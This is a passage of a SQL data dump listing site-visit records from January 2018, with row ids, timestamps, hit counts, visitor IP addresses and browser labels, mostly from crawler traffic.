8,1515348842,1,1,0,0,'54.36.148.178','other'),(195759,1515349488,1,1,0,0,'188.163.87.75','chrome'),(195760,1515349988,1,1,0,0,'178.94.172.107','chrome'),(195761,1515350165,1,1,0,0,'54.36.148.162','other'),(195762,1515350263,1,1,0,0,'54.36.149.62','other'),(195763,1515350362,1,1,0,0,'54.36.148.253','other'),(195764,1515350565,1,0,1,0,'66.249.66.157',''),(195765,1515350639,1,1,0,0,'8.29.198.26','other'),(195766,1515350730,1,1,0,0,'54.36.149.49','other'),(195767,1515350810,1,1,0,0,'54.36.149.65','other'),(195768,1515351110,1,0,1,0,'66.249.66.155',''),(195769,1515351851,1,0,1,0,'66.249.66.76',''),(195770,1515351891,1,1,0,0,'54.36.148.91','other'),(195771,1515352241,2,2,0,0,'40.77.167.71','other'),(195772,1515352416,1,1,0,0,'54.36.149.64','other'),(195773,1515352669,1,0,1,0,'66.249.66.156',''),(195774,1515352933,1,1,0,0,'195.58.249.162','chrome'),(195775,1515353682,1,1,0,0,'54.36.148.53','other'),(195776,1515353788,1,1,0,0,'54.36.148.78','other'),(195777,1515354130,1,1,0,0,'54.36.148.146','other'),(195778,1515355363,1,1,0,0,'54.36.148.164','other'),(195779,1515355477,2,2,0,0,'157.55.39.214','other'),(195780,1515356500,1,1,0,0,'54.36.148.11','other'),(195781,1515356629,1,1,0,0,'54.36.148.55','other'),(195782,1515356674,1,1,0,0,'54.36.149.23','other'),(195783,1515356697,1,1,0,0,'54.36.148.151','other'),(195784,1515357429,1,1,0,0,'54.36.148.249','other'),(195785,1515357451,1,1,0,0,'54.36.149.85','other'),(195786,1515357926,1,1,0,0,'40.77.167.33','other'),(195787,1515357946,1,1,0,0,'54.36.148.192','other'),(195788,1515358397,1,1,0,0,'54.36.148.84','other'),(195789,1515358747,1,1,0,0,'54.36.148.180','other'),(195790,1515358756,1,1,0,0,'54.36.148.159','other'),(195791,1515358768,1,1,0,0,'40.77.167.71','other'),(195792,1515358921,1,1,0,0,'54.36.148.38','other'),(195793,1515359805,1,1,0,0,'54.36.148.109','other'),(195794,1515359848,1,1,0,0,'66.249.66.157','chrome'),(195795,1515359854,1,1,0,0,'66.249.66.75','chrome'),(195796,1515360447,1,1,0,0,'54.36.148.144','other'),(195797,1515360752,1,0,1,0,'66.249.66.157',''),(195798,1515360819,1,1,0,0,'54.36.148.92','other'),(195799,1515361041,1,1,0,0,'54.36.148.11','other'),(195800,1515361483,1,1,0,0,'8.29.198.27','other'),(195801,1515361817,1,0,1,0,'66.249.66.76',''),(195802,1515362120,1,1,0,0,'157.55.39.214','other'),(195803,1515362217,1,1,0,0,'54.36.149.1','other'),(195804,1515362760,1,1,0,0,'54.36.149.79','other'),(195805,1515362820,1,1,0,0,'37.73.194.5','chrome'),(195806,1515362861,1,1,0,0,'54.36.148.202','other'),(195807,1515363013,1,1,0,0,'54.36.148.181','other'),(195808,1515364242,1,0,1,0,'66.249.66.155',''),(195809,1515364731,1,1,0,0,'91.196.178.130','chrome'),(195810,1515364979,1,1,0,0,'54.36.149.29','other'),(195811,1515365084,1,1,0,0,'54.36.148.147','other'),(195812,1515365231,1,1,0,0,'54.36.148.89','other'),(195813,1515365854,1,1,0,0,'54.36.149.55','other'),(195814,1515365995,1,1,0,0,'54.36.148.98','other'),(195815,1515366277,1,1,0,0,'54.36.148.173','other'),(195816,1515366573,1,1,0,0,'51.255.71.122','other'),(195817,1515366735,1,1,0,0,'54.36.148.51','other'),(195818,1515366737,1,1,0,0,'54.36.148.255','other'),(195819,1515366810,1,1,0,0,'54.36.148.27','other'),(195820,1515366957,1,0,1,0,'66.249.66.155',''),(195821,1515367639,1,1,0,0,'54.36.149.104','other'),(195822,1515367654,1,1,0,0,'157.55.39.88','other'),(195823,1515368216,1,1,0,0,'54.36.148.176','other'),(195824,1515368716,1,0,1,0,'66.249.66.155',''),(195825,1515368877,1,1,0,0,'54.36.148.208','other'),(195826,1515369394,1,1,0,0,'51.255.71.126','other'),(195827,1515369599,1,1,0,0,'141.8.142.74','other'),(195828,1515370334,1,1,0,0,'54.36.148.192','other'),(195829,1515371407,1,1,0,0,'157.55.39.88','other'),(195830,1515371464,1,1,0,0,'54.36.149.15','other'),(195831,1515371698,1,1,0,0,'54.36.149.103','other'),(195832,1515371762,1,1,0,0,'54.36.149.23','other'),(195833,1515372232,1,1,0,0,'54.36.149.99','other'),(195834,1515372252,1,1,0,0,'54.36.148.33','other'),(195835,1515372317,1,1,0,0,'8.29.198.26','other'),(195836,1515372437,1,1,0,0,'54.36.148.21','other'),(195837,1515372955,1,0,1,0,'66.249.66.157',''),(195838,1515373037,1,1,0,0,'54.36.148.158','other'),(195839,1515373209,1,1,0,0,'51.255.71.127','other'),(195840,1515373733,1,1,0,0,'54.36.149.64','other'),(195841,1515373743,1,1,0,0,'157.55.39.88','other'),(195842,1515373933,1,1,0,0,'54.36.148.72','other'),(195843,1515374048,1,1,0,0,'157.55.39.140','other'),(195844,1515374101,1,1,0,0,'54.36.148.114','other'),(195845,1515374126,1,1,0,0,'54.36.149.15','other'),(195846,1515374315,1,1,0,0,'54.36.149.38','other'),(195847,1515374333,1,1,0,0,'54.36.149.84','other'),(195848,1515374445,1,1,0,0,'54.36.149.44','other'),(195849,1515374690,1,1,0,0,'54.36.149.20','other'),(195850,1515374927,1,1,0,0,'40.77.167.71','other'),(195851,1515375140,1,1,0,0,'54.36.148.10','other'),(195852,1515375197,1,1,0,0,'54.36.148.94','other'),(195853,1515375718,1,1,0,0,'54.36.149.39','other'),(195854,1515376431,1,1,0,0,'54.36.149.12','other'),(195855,1515376563,1,1,0,0,'54.36.149.95','other'),(195856,1515376704,1,1,0,0,'54.36.149.80','other'),(195857,1515376786,1,1,0,0,'46.48.13.161','chrome'),(195858,1515377246,1,1,0,0,'54.36.149.37','other'),(195859,1515377303,1,1,0,0,'54.36.148.38','other'),(195860,1515377915,1,0,1,0,'66.249.66.155',''),(195861,1515378251,1,1,0,0,'54.36.149.84','other'),(195862,1515378273,2,1,1,0,'66.249.66.155',''),(195863,1515378385,1,1,0,0,'54.36.149.88','other'),(195864,1515378423,1,1,0,0,'54.36.149.19','other'),(195865,1515378696,1,1,0,0,'54.36.149.23','other'),(195866,1515378968,1,1,0,0,'54.165.59.7','other'),(195867,1515379056,1,1,0,0,'54.36.148.80','other'),(195868,1515379257,1,1,0,0,'54.36.148.253','other'),(195869,1515379274,1,1,0,0,'54.36.148.63','other'),(195870,1515379354,1,1,0,0,'54.36.148.108','other'),(195871,1515380017,1,1,0,0,'54.36.148.159','other'),(195872,1515380221,1,1,0,0,'54.36.148.80','other'),(195873,1515380453,1,1,0,0,'40.77.167.71','other'),(195874,1515380737,1,1,0,0,'54.36.148.148','other'),(195875,1515380801,1,1,0,0,'54.36.148.244','other'),(195876,1515380892,1,0,1,0,'66.249.66.155',''),(195877,1515381474,1,1,0,0,'51.255.71.123','other'),(195878,1515381553,2,2,0,0,'54.36.149.42','other'),(195879,1515383115,1,1,0,0,'54.36.149.19','other'),(195880,1515383151,1,0,1,0,'66.249.66.156',''),(195881,1515383161,1,1,0,0,'8.29.198.25','other'),(195882,1515384000,1,1,0,0,'54.36.148.181','other'),(195883,1515384324,1,1,0,0,'54.36.148.173','other'),(195884,1515384957,1,1,0,0,'66.249.66.155','chrome'),(195885,1515384962,1,1,0,0,'66.249.66.76','chrome'),(195886,1515385053,1,1,0,0,'141.8.142.74','other'),(195887,1515385299,1,1,0,0,'54.36.148.90','other'),(195888,1515385334,1,1,0,0,'54.36.148.201','other'),(195889,1515386089,2,2,0,0,'54.36.148.104','other'),(195890,1515386314,1,1,0,0,'54.36.148.186','other'),(195891,1515386454,1,1,0,0,'54.36.149.29','other'),(195892,1515386756,1,0,1,0,'66.249.66.74',''),(195893,1515387482,1,1,0,0,'54.36.148.247','other'),(195894,1515387693,1,1,0,0,'54.36.149.51','other'),(195895,1515387870,1,1,0,0,'51.255.71.113','other'),(195896,1515388056,1,1,0,0,'54.36.149.103','other'),(195897,1515388155,1,1,0,0,'54.36.148.48','other'),(195898,1515388163,1,1,0,0,'54.36.148.120','other'),(195899,1515388659,1,1,0,0,'54.36.149.40','other'),(195900,1515388784,1,1,0,0,'54.36.148.152','other'),(195901,1515388797,1,1,0,0,'54.36.148.163','other'),(195902,1515388812,1,1,0,0,'54.36.148.158','other'),(195903,1515389475,1,1,0,0,'54.36.148.101','other'),(195904,1515389718,1,1,0,0,'94.180.175.211','msie'),(195905,1515389986,1,1,0,0,'54.36.148.231','other'),(195906,1515390347,1,0,1,0,'66.249.66.157',''),(195907,1515390432,1,1,0,0,'54.36.148.136','other'),(195908,1515391016,1,1,0,0,'51.255.71.131','other'),(195909,1515391202,1,1,0,0,'54.36.149.11','other'),(195910,1515391431,1,1,0,0,'141.8.142.74','other'),(195911,1515391601,1,1,0,0,'198.37.118.9','firefox'),(195912,1515391625,1,1,0,0,'54.36.148.110','other'),(195913,1515391740,1,1,0,0,'77.37.140.236','chrome'),(195914,1515392220,1,0,1,0,'66.249.66.157',''),(195915,1515392805,1,1,0,0,'207.46.13.186','other'),(195916,1515392861,1,1,0,0,'54.36.148.137','other'),(195917,1515392917,1,1,0,0,'54.36.148.241','other'),(195918,1515393281,1,1,0,0,'54.36.148.207','other'),(195919,1515393998,1,1,0,0,'8.29.198.26','other'),(195920,1515394283,1,1,0,0,'40.77.167.19','other'),(195921,1515394416,1,1,0,0,'178.154.171.88','other'),(195922,1515394780,1,1,0,0,'216.244.66.237','other'),(195923,1515394896,1,1,0,0,'54.36.149.44','other'),(195924,1515395387,1,1,0,0,'40.77.167.54','other'),(195925,1515396270,1,1,0,0,'54.36.149.104','other'),(195926,1515396453,1,1,0,0,'54.36.148.234','other'),(195927,1515397166,1,1,0,0,'54.36.148.42','other'),(195928,1515397780,1,1,0,0,'54.36.148.33','other'),(195929,1515397863,1,1,0,0,'54.36.148.159','other'),(195930,1515397894,1,1,0,0,'216.244.66.237','other'),(195931,1515398015,1,1,0,0,'54.36.149.44','other'),(195932,1515398165,1,1,0,0,'54.36.148.205','other'),(195933,1515398250,1,1,0,0,'54.36.149.47','other'),(195934,1515398252,1,1,0,0,'91.200.12.196','chrome'),(195935,1515398352,1,1,0,0,'54.36.148.137','other'),(195936,1515399234,1,1,0,0,'178.154.171.88','other'),(195937,1515399239,1,1,0,0,'54.36.148.207','other'),(195938,1515399593,1,1,0,0,'54.36.148.91','other'),(195939,1515399611,1,1,0,0,'54.36.149.95','other'),(195940,1515399691,1,1,0,0,'51.255.71.121','other'),(195941,1515399719,2,2,0,0,'95.213.141.124','opera'),(195942,1515400022,3,3,0,0,'62.210.157.95','other'),(195943,1515400082,1,1,0,0,'54.36.148.131','other'),(195944,1515400646,1,0,1,0,'66.249.66.157',''),(195945,1515400923,1,1,0,0,'54.36.149.40','other'),(195946,1515401204,1,1,0,0,'54.36.148.232','other'),(195947,1515401292,1,1,0,0,'54.36.149.72','other'),(195948,1515401523,1,1,0,0,'54.36.148.32','other'),(195949,1515401530,1,1,0,0,'40.77.167.137','other'),(195950,1515401575,1,0,1,0,'66.249.66.156',''),(195951,1515401598,1,1,0,0,'54.36.149.104','other'),(195952,1515401999,1,1,0,0,'54.36.149.68','other'),(195953,1515402241,1,1,0,0,'54.36.149.33','other'),(195954,1515402725,1,1,0,0,'54.36.149.43','other'),(195955,1515403043,1,1,0,0,'54.36.149.19','other'),(195956,1515403804,1,0,1,0,'66.249.66.155',''),(195957,1515403908,1,1,0,0,'54.36.148.238','other'),(195958,1515404080,1,1,0,0,'54.36.148.147','other'),(195959,1515404298,1,1,0,0,'54.36.148.114','other'),(195960,1515404649,1,1,0,0,'54.36.148.205','other'),(195961,1515404833,1,1,0,0,'8.29.198.25','other'),(195962,1515405098,1,1,0,0,'51.255.71.117','other'),(195963,1515405531,1,1,0,0,'207.46.13.142','other'),(195964,1515405761,1,1,0,0,'54.36.148.50','other'),(195965,1515406414,1,1,0,0,'54.36.148.115','other'),(195966,1515406803,1,0,1,0,'66.249.66.157',''),(195967,1515407003,1,1,0,0,'51.255.71.116','other'),(195968,1515407303,1,1,0,0,'54.36.148.54','other'),(195969,1515407569,1,1,0,0,'91.124.119.67','chrome'),(195970,1515407573,1,1,0,0,'54.36.148.70','other'),(195971,1515407588,1,1,0,0,'141.8.142.74','other'),(195972,1515407671,1,1,0,0,'54.36.149.10','other'),(195973,1515408276,1,1,0,0,'87.250.224.46','other'),(195974,1515408343,1,1,0,0,'66.249.66.155','chrome'),(195975,1515408359,1,1,0,0,'66.249.66.75','chrome'),(195976,1515408726,1,1,0,0,'54.36.148.197','other'),(195977,1515408830,1,1,0,0,'141.8.142.74','other'),(195978,1515408893,1,1,0,0,'46.211.114.107','chrome'),(195979,1515409362,1,1,0,0,'54.36.149.74','other'),(195980,1515409534,1,1,0,0,'130.180.208.215','chrome'),(195981,1515409696,1,0,1,0,'66.249.66.155',''),(195982,1515409707,1,1,0,0,'54.36.148.167','other'),(195983,1515409862,1,1,0,0,'54.36.148.200','other'),(195984,1515410001,1,1,0,0,'54.36.148.253','other'),(195985,1515410189,1,0,1,0,'66.249.66.76',''),(195986,1515410256,1,1,0,0,'91.196.178.135','firefox'),(195987,1515410365,1,1,0,0,'54.36.148.48','other'),(195988,1515410801,1,1,0,0,'54.36.149.49','other'),(195989,1515411264,1,1,0,0,'54.36.149.74','other'),(195990,1515411401,1,1,0,0,'54.36.149.45','other'),(195991,1515411426,1,1,0,0,'54.36.148.32','other'),(195992,1515411515,1,1,0,0,'54.36.148.48','other'),(195993,1515411618,1,1,0,0,'54.36.148.51','other'),(195994,1515411860,1,1,0,0,'54.36.148.29','other'),(195995,1515412339,1,1,0,0,'91.196.178.53','chrome'),(195996,1515412367,1,1,0,0,'54.36.148.235','other'),(195997,1515412901,1,1,0,0,'54.36.149.102','other'),(195998,1515413350,1,1,0,0,'54.36.148.100','other'),(195999,1515413513,1,1,0,0,'54.36.148.22','other'),(196000,1515413660,1,1,0,0,'54.36.149.84','other'),(196001,1515413954,1,1,0,0,'54.36.148.120','other'),(196002,1515414249,1,1,0,0,'54.36.148.162','other'),(196003,1515414274,1,1,0,0,'176.37.100.253','chrome'),(196004,1515414619,1,1,0,0,'54.36.148.129','other'),(196005,1515414636,1,1,0,0,'54.36.148.183','other'),(196006,1515414808,1,1,0,0,'51.255.71.132','other'),(196007,1515415183,1,1,0,0,'54.36.149.66','other'),(196008,1515415606,1,1,0,0,'54.36.149.10','other'),(196009,1515415672,1,1,0,0,'8.29.198.26','other'),(196010,1515416010,1,1,0,0,'54.36.148.188','other'),(196011,1515416120,1,1,0,0,'51.255.71.128','other'),(196012,1515416692,1,1,0,0,'207.46.13.16','other'),(196013,1515417031,2,2,0,0,'141.8.142.74','other'),(196014,1515417236,1,1,0,0,'198.50.154.188','chrome'),(196015,1515417254,1,1,0,0,'54.36.148.196','other'),(196016,1515417364,1,1,0,0,'54.36.148.46','other'),(196017,1515417684,1,1,0,0,'54.36.148.198','other'),(196018,1515418038,1,1,0,0,'54.36.149.99','other'),(196019,1515418090,1,1,0,0,'91.196.178.16','chrome'),(196020,1515418662,1,1,0,0,'91.196.178.36','chrome'),(196021,1515418913,2,2,0,0,'91.196.178.53','chrome'),(196022,1515418960,1,0,1,0,'66.249.66.76',''),(196023,1515419487,1,1,0,0,'141.8.142.74','other'),(196024,1515419882,1,1,0,0,'54.36.148.233','other'),(196025,1515419963,1,1,0,0,'54.36.149.2','other'),(196026,1515420116,1,1,0,0,'54.36.148.138','other'),(196027,1515420522,1,1,0,0,'54.36.149.56','other'),(196028,1515420523,1,1,0,0,'51.255.71.121','other'),(196029,1515421154,1,1,0,0,'51.255.71.117','other'),(196030,1515421161,1,1,0,0,'40.77.167.109','other'),(196031,1515421676,1,1,0,0,'54.36.148.253','other'),(196032,1515422010,1,1,0,0,'91.196.178.104','chrome'),(196033,1515422026,1,1,0,0,'54.36.148.78','other'),(196034,1515422031,1,1,0,0,'141.8.142.74','other'),(196035,1515422284,1,1,0,0,'54.36.149.62','other'),(196036,1515422922,1,1,0,0,'54.36.148.66','other'),(196037,1515423085,1,1,0,0,'54.36.149.37','other'),(196038,1515423687,1,1,0,0,'54.36.149.14','other'),(196039,1515423860,1,1,0,0,'54.36.149.83','other'),(196040,1515424637,1,1,0,0,'54.36.149.62','other'),(196041,1515424655,1,1,0,0,'54.36.148.114','other'),(196042,1515425089,1,1,0,0,'91.209.11.236','other'),(196043,1515425285,1,1,0,0,'54.36.148.62','other'),(196044,1515425397,1,0,1,0,'66.249.66.156',''),(196045,1515425797,1,1,0,0,'54.36.149.87','other'),(196046,1515425814,1,1,0,0,'54.36.148.13','other'),(196047,1515426194,1,0,1,0,'66.249.66.155',''),(196048,1515426236,1,1,0,0,'54.36.149.97','other'),(196049,1515426510,1,1,0,0,'8.29.198.27','other'),(196050,1515427258,1,1,0,0,'40.77.167.16','other'),(196051,1515427841,1,1,0,0,'54.36.149.69','other'),(196052,1515428040,1,1,0,0,'66.249.66.157','chrome'),(196053,1515428047,2,1,1,0,'66.249.66.79',''),(196054,1515428937,1,1,0,0,'91.209.11.236','other'),(196055,1515429092,1,0,1,0,'66.249.66.156',''),(196056,1515429247,1,1,0,0,'107.167.108.89','other'),(196057,1515429426,1,1,0,0,'54.36.149.38','other'),(196058,1515429527,1,1,0,0,'54.36.148.39','other'),(196059,1515429592,1,1,0,0,'54.36.148.119','other'),(196060,1515430070,1,1,0,0,'54.36.148.139','other'),(196061,1515432200,1,1,0,0,'54.36.149.55','other'),(196062,1515432585,1,1,0,0,'40.77.167.36','other'),(196063,1515433081,1,1,0,0,'54.36.149.2','other'),(196064,1515433254,1,1,0,0,'178.154.171.88','other'),(196065,1515433274,1,1,0,0,'54.36.148.45','other'),(196066,1515433417,1,1,0,0,'54.36.148.235','other'),(196067,1515433898,1,1,0,0,'54.36.148.23','other'),(196068,1515434643,1,1,0,0,'157.55.39.122','other'),(196069,1515435141,2,0,2,0,'66.249.66.155',''),(196070,1515435453,1,1,0,0,'51.255.71.122','other'),(196071,1515435458,1,1,0,0,'54.36.148.74','other'),(196072,1515435497,1,1,0,0,'54.36.148.246','other'),(196073,1515436312,1,1,0,0,'54.36.148.146','other'),(196074,1515436690,1,1,0,0,'54.36.148.65','other'),(196075,1515436749,1,1,0,0,'54.36.148.246','other'),(196076,1515436810,1,1,0,0,'54.36.148.196','other'),(196077,1515436999,1,1,0,0,'54.36.149.62','other'),(196078,1515437037,1,1,0,0,'54.36.148.148','other'),(196079,1515437054,1,1,0,0,'162.210.196.97','other'),(196080,1515437228,1,1,0,0,'40.77.167.36','other'),(196081,1515437353,1,1,0,0,'8.29.198.26','other'),(196082,1515437931,1,1,0,0,'54.36.148.203','other'),(196083,1515438357,1,1,0,0,'54.36.148.187','other'),(196084,1515438945,1,1,0,0,'54.36.149.98','other'),(196085,1515439078,1,1,0,0,'54.36.148.68','other'),(196086,1515439300,2,2,0,0,'130.180.218.96','chrome'),(196087,1515440066,1,1,0,0,'54.36.149.86','other'),(196088,1515440391,1,1,0,0,'54.36.148.236','other'),(196089,1515440462,1,1,0,0,'54.36.149.27','other'),(196090,1515440656,1,0,1,0,'66.249.66.155',''),(196091,1515440679,1,1,0,0,'54.36.149.64','other'),(196092,1515440897,1,1,0,0,'54.36.148.164','other'),(196093,1515440964,1,1,0,0,'54.36.148.237','other'),(196094,1515441177,1,1,0,0,'54.36.148.73','other'),(196095,1515441348,1,1,0,0,'188.42.35.214','chrome'),(196096,1515441494,1,1,0,0,'54.36.148.156','other'),(196097,1515441521,1,1,0,0,'54.36.148.183','other'),(196098,1515442467,1,1,0,0,'54.36.148.79','other'),(196099,1515442942,1,1,0,0,'54.36.148.160','other'),(196100,1515443262,1,1,0,0,'54.36.149.39','other'),(196101,1515443340,1,1,0,0,'54.36.148.179','other'),(196102,1515444323,1,1,0,0,'207.46.13.173','other'),(196103,1515444519,1,1,0,0,'54.36.148.109','other'),(196104,1515445860,1,1,0,0,'54.36.149.0','other'),(196105,1515446199,1,1,0,0,'51.255.71.125','other'),(196106,1515446442,1,1,0,0,'54.36.148.144','other'),(196107,1515447006,1,0,1,0,'66.249.66.74',''),(196108,1515447744,1,1,0,0,'46.48.13.161','chrome'),(196109,1515447814,1,1,0,0,'207.46.13.173','other'),(196110,1515448189,1,1,0,0,'8.29.198.27','other'),(196111,1515448314,1,1,0,0,'91.209.11.236','other'),(196112,1515448546,1,1,0,0,'188.230.43.254','other'),(196113,1515449160,1,1,0,0,'54.36.148.119','other'),(196114,1515449450,1,1,0,0,'46.48.13.161','chrome'),(196115,1515449467,1,1,0,0,'54.36.148.117','other'),(196116,1515450679,1,1,0,0,'66.249.66.155','chrome'),(196117,1515450696,2,1,1,0,'66.249.66.74',''),(196118,1515450869,1,0,1,0,'66.249.66.156',''),(196119,1515451199,1,1,0,0,'74.115.214.142','other'),(196120,1515455737,1,1,0,0,'54.36.149.44','other'),(196121,1515457133,1,1,0,0,'54.36.148.144','other'),(196122,1515457413,1,1,0,0,'54.36.148.105','other'),(196123,1515457528,1,1,0,0,'54.36.148.63','other'),(196124,1515458384,1,1,0,0,'54.36.148.149','other'),(196125,1515458510,1,1,0,0,'54.36.148.29','other'),(196126,1515458710,1,0,1,0,'66.249.66.75',''),(196127,1515458756,1,1,0,0,'54.36.148.131','other'),(196128,1515458991,1,1,0,0,'54.36.148.70','other'),(196129,1515459029,1,1,0,0,'8.29.198.25','other'),(196130,1515459702,1,1,0,0,'54.36.148.181','other'),(196131,1515460075,1,1,0,0,'54.36.148.59','other'),(196132,1515461126,1,1,0,0,'54.36.148.158','other'),(196133,1515461400,1,1,0,0,'54.36.148.236','other'),(196134,1515461750,1,1,0,0,'37.145.30.147','msie'),(196135,1515462717,1,0,1,0,'66.249.66.155',''),(196136,1515462806,1,1,0,0,'54.36.148.17','other'),(196137,1515467778,1,1,0,0,'207.46.13.173','other'),(196138,1515469811,2,2,0,0,'157.55.39.9','other'),(196139,1515469864,1,1,0,0,'8.29.198.26','other'),(196140,1515470253,1,1,0,0,'207.46.13.173','other'),(196141,1515470443,1,0,1,0,'66.249.66.156',''),(196142,1515470921,1,1,0,0,'216.244.66.237','other'),(196143,1515471004,22,22,0,0,'91.236.134.151','other'),(196144,1515471260,1,1,0,0,'54.36.148.182','other'),(196145,1515471432,2,0,2,0,'66.249.66.156',''),(196146,1515472099,1,1,0,0,'54.36.148.95','other'),(196147,1515472104,1,1,0,0,'54.36.148.232','other'),(196148,1515472290,1,0,1,0,'66.249.66.155',''),(196149,1515472402,1,1,0,0,'54.36.148.38','other'),(196150,1515472686,1,1,0,0,'54.36.148.253','other'),(196151,1515473364,1,1,0,0,'54.36.148.26','other'),(196152,1515473481,1,1,0,0,'54.36.148.142','other'),(196153,1515473494,1,1,0,0,'51.255.71.118','other'),(196154,1515473926,1,1,0,0,'95.221.52.202','chrome'),(196155,1515474626,1,1,0,0,'54.36.149.9','other'),(196156,1515474913,1,1,0,0,'54.36.148.130','other'),(196157,1515475020,1,1,0,0,'188.230.43.254','other'),(196158,1515476470,1,1,0,0,'66.249.66.157','chrome'),(196159,1515476478,1,0,1,0,'66.249.66.76',''),(196160,1515476494,1,1,0,0,'66.249.66.75','chrome'),(196161,1515477391,1,1,0,0,'188.230.43.254','other'),(196162,1515477855,1,1,0,0,'46.48.13.161','chrome'),(196163,1515477969,1,1,0,0,'54.36.148.13','other'),(196164,1515478031,1,1,0,0,'54.36.148.40','other'),(196165,1515478911,1,1,0,0,'54.36.148.131','other'),(196166,1515479342,1,1,0,0,'51.255.71.125','other'),(196167,1515479398,1,0,1,0,'66.249.66.157',''),(196168,1515479440,1,1,0,0,'207.46.13.172','other'),(196169,1515479797,1,1,0,0,'188.230.43.254','other'),(196170,1515480237,1,1,0,0,'141.8.142.74','other'),(196171,1515480690,1,1,0,0,'8.29.198.25','other'),(196172,1515481169,1,1,0,0,'91.196.178.70','chrome'),(196173,1515481544,28,28,0,0,'144.76.115.190','other'),(196174,1515481659,1,1,0,0,'91.196.178.165','chrome'),(196175,1515481912,1,1,0,0,'77.111.244.24','chrome'),(196176,1515482510,1,1,0,0,'178.154.171.88','other'),(196177,1515483263,1,1,0,0,'87.250.224.46','other'),(196178,1515483922,1,1,0,0,'157.55.39.220','other'),(196179,1515483975,1,1,0,0,'77.111.244.15','chrome'),(196180,1515484626,1,1,0,0,'46.219.33.141','other'),(196181,1515484651,1,1,0,0,'95.132.26.253','chrome'),(196182,1515484938,1,1,0,0,'46.42.135.253','msie'),(196183,1515485500,1,1,0,0,'95.132.98.252','firefox'),(196184,1515485803,1,0,1,0,'66.249.66.157',''),(196185,1515486347,1,1,0,0,'95.135.227.44','chrome'),(196186,1515487426,1,1,0,0,'95.132.98.252','firefox'),(196187,1515488600,1,1,0,0,'40.77.167.24','other'),(196188,1515489884,1,1,0,0,'54.36.148.45','other'),(196189,1515490071,1,1,0,0,'141.8.142.74','other'),(196190,1515490242,1,1,0,0,'91.196.178.65','chrome'),(196191,1515490311,1,0,1,0,'66.249.66.156',''),(196192,1515490665,1,1,0,0,'54.36.149.93','other'),(196193,1515490865,1,1,0,0,'54.36.148.173','other'),(196194,1515491017,1,1,0,0,'91.196.178.53','chrome'),(196195,1515491393,2,2,0,0,'178.92.74.78','chrome'),(196196,1515491466,1,1,0,0,'31.13.113.174','other'),(196197,1515491468,1,1,0,0,'31.13.114.52','other'),(196198,1515491470,1,1,0,0,'31.13.114.55','other'),(196199,1515491523,1,1,0,0,'8.29.198.26','other'),(196200,1515492013,1,1,0,0,'94.153.192.46','firefox'),(196201,1515492089,1,0,1,0,'66.249.66.74',''),(196202,1515492804,1,1,0,0,'91.193.128.228','chrome'),(196203,1515492863,1,1,0,0,'178.154.171.88','other'),(196204,1515494163,2,2,0,0,'91.196.178.65','chrome'),(196205,1515494322,1,1,0,0,'207.244.157.139','chrome'),(196206,1515494445,1,1,0,0,'91.196.177.15','chrome'),(196207,1515494576,1,1,0,0,'31.43.25.187','chrome'),(196208,1515494693,1,0,1,0,'66.249.66.157',''),(196209,1515494731,1,1,0,0,'13.56.229.65','chrome'),(196210,1515494953,1,1,0,0,'54.36.148.28','other'),(196211,1515495137,1,1,0,0,'54.36.148.141','other'),(196212,1515495197,1,1,0,0,'54.36.148.145','other'),(196213,1515495334,1,1,0,0,'54.36.148.164','other'),(196214,1515496364,1,1,0,0,'54.36.148.58','other'),(196215,1515496437,1,1,0,0,'54.36.148.113','other'),(196216,1515496661,1,1,0,0,'54.36.149.100','other'),(196217,1515496751,1,1,0,0,'54.36.148.114','other'),(196218,1515497083,1,1,0,0,'54.36.148.141','other'),(196219,1515497176,1,1,0,0,'94.178.104.65','chrome'),(196220,1515497194,1,1,0,0,'54.36.148.186','other'),(196221,1515497439,1,1,0,0,'54.36.148.78','other'),(196222,1515497613,1,1,0,0,'54.36.148.179','other'),(196223,1515498039,1,1,0,0,'54.36.148.28','other'),(196224,1515498180,1,1,0,0,'178.95.55.108','firefox'),(196225,1515498486,1,1,0,0,'54.36.149.93','other'),(196226,1515499029,1,1,0,0,'54.36.148.78','other'),(196227,1515499122,1,1,0,0,'54.36.149.79','other'),(196228,1515499340,1,1,0,0,'141.8.142.74','other'),(196229,1515499370,1,1,0,0,'54.36.148.89','other'),(196230,1515500160,1,1,0,0,'54.36.149.2','other'),(196231,1515500288,1,1,0,0,'54.36.148.165','other'),(196232,1515500329,1,1,0,0,'91.196.178.165','chrome'),(196233,1515500689,1,0,1,0,'66.249.66.156',''),(196234,1515500698,1,1,0,0,'54.36.148.42','other'),(196235,1515500959,1,1,0,0,'207.46.13.173','other'),(196236,1515501541,2,2,0,0,'91.196.121.8','chrome'),(196237,1515501824,1,1,0,0,'37.9.113.182','other'),(196238,1515502353,1,1,0,0,'8.29.198.27','other'),(196239,1515502670,1,0,1,0,'66.249.66.157',''),(196240,1515502791,1,1,0,0,'54.36.148.196','other'),(196241,1515502796,1,1,0,0,'54.36.149.58','other'),(196242,1515502823,1,1,0,0,'54.36.149.8','other'),(196243,1515503168,1,1,0,0,'51.255.71.117','other'),(196244,1515503263,1,1,0,0,'91.196.178.100','chrome'),(196245,1515503333,1,1,0,0,'87.250.224.46','other'),(196246,1515503341,1,1,0,0,'91.196.178.68','chrome'),(196247,1515503798,1,1,0,0,'141.8.142.74','other'),(196248,1515504429,1,1,0,0,'54.36.148.148','other'),(196249,1515504595,1,1,0,0,'91.196.178.167','chrome'),(196250,1515504688,1,1,0,0,'91.209.96.68','firefox'),(196251,1515504927,1,1,0,0,'87.250.224.46','other'),(196252,1515505027,1,1,0,0,'91.196.178.65','chrome'),(196253,1515505518,1,0,1,0,'66.249.66.156',''),(196254,1515506846,1,1,0,0,'54.36.149.74','other'),(196255,1515506948,1,1,0,0,'37.53.66.16','chrome'),(196256,1515506998,2,2,0,0,'54.165.59.7','other'),(196257,1515507038,1,1,0,0,'54.36.148.53','other'),(196258,1515507122,1,1,0,0,'54.36.148.148','other'),(196259,1515507144,1,1,0,0,'54.36.148.133','other'),(196260,1515507228,1,1,0,0,'207.46.13.173','other'),(196261,1515507232,1,1,0,0,'54.36.148.64','other'),(196262,1515507352,1,1,0,0,'66.249.66.156','chrome'),(196263,1515507354,1,1,0,0,'54.36.148.183','other'),(196264,1515507356,1,1,0,0,'54.36.148.236','other'),(196265,1515507360,1,0,1,0,'66.249.66.74',''),(196266,1515507374,1,1,0,0,'66.249.66.74','chrome'),(196267,1515507381,1,1,0,0,'87.250.224.46','other'),(196268,1515507406,1,1,0,0,'54.36.148.230','other'),(196269,1515507787,1,1,0,0,'178.154.171.88','other'),(196270,1515507907,1,1,0,0,'54.36.149.68','other'),(196271,1515507985,1,1,0,0,'54.36.148.129','other'),(196272,1515508182